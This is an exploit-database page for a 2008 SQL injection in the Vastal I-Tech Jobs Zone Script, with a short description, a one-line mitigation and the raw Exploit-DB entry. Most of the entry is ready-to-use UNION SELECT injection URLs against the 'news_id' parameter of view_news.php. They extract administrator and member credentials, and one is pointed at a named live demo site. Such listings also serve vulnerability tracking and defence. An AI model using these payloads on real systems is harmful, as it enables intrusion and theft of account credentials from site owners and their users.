header-logo
Suggest Exploit
vendor:
Jobs Zone Script
by:
Stack
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Jobs Zone Script
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Vastal I-Tech Jobs Zone SQL Injection Vulnerability

A vulnerability in Vastal I-Tech Jobs Zone Script allows an attacker to inject arbitrary SQL commands via the 'news_id' parameter in 'view_news.php' script. An attacker can exploit this vulnerability to gain access to the administrator's credentials and other sensitive information.

Mitigation:

Input validation should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

#######################################################
#  Vastal I-Tech Jobs Zone SQL Injection Vulnerability
#
# Author   : Stack
#
#
# Script Home Page : http://www.vastal.com/jobs-zone-classifieds-script.html
#
# Demo      : http://www.vastal.com/jobs/
#######################################################
Exploit:
http://site.il/view_news.php?news_id=-1/**/UNION/**/SELECT/**/1,concat_ws(0x3a,admin_user,admin_password),3,4,5,6,7/**/from/**/admin_users/*
http://site.il/view_news.php?news_id=-1/**/UNION/**/SELECT/**/1,concat_ws(0x3a,password,user()),version(),4,5,6,7/**/from/**/members/*
Live Demo
http://www.vastal.com/jobs/view_news.php?news_id=-1/**/UNION/**/SELECT/**/1,concat_ws(0x3a,admin_user,admin_password),3,4,5,6,7/**/from/**/admin_users/*
##############################################################################################################

# milw0rm.com [2008-09-05]